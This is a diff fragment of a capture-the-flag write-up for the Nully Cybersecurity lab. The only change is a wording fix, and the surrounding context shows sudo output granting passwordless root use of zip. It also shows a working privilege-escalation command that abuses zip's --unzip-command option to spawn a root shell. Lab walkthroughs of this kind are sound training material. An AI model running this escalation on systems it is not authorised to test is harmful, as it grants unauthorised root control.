TeoGia/offsec-training/nully-cybersecurity-1.md

 User my2user may run the following commands on MailServer:
     (root) NOPASSWD: /usr/bin/zip
 ```
-Lucky for us the my2user can execute `/usr/bin/zip` as root without a password.
+Luckily for us the my2user can execute `/usr/bin/zip` as root without a password.
 Doing a little googling, I found out that zip can execute arbitrary commands like this:
 ```
 my2user@MailServer:~$ touch file
 my2user@MailServer:~$ sudo zip 1.zip file -T --unzip-command="sh -c /bin/bash"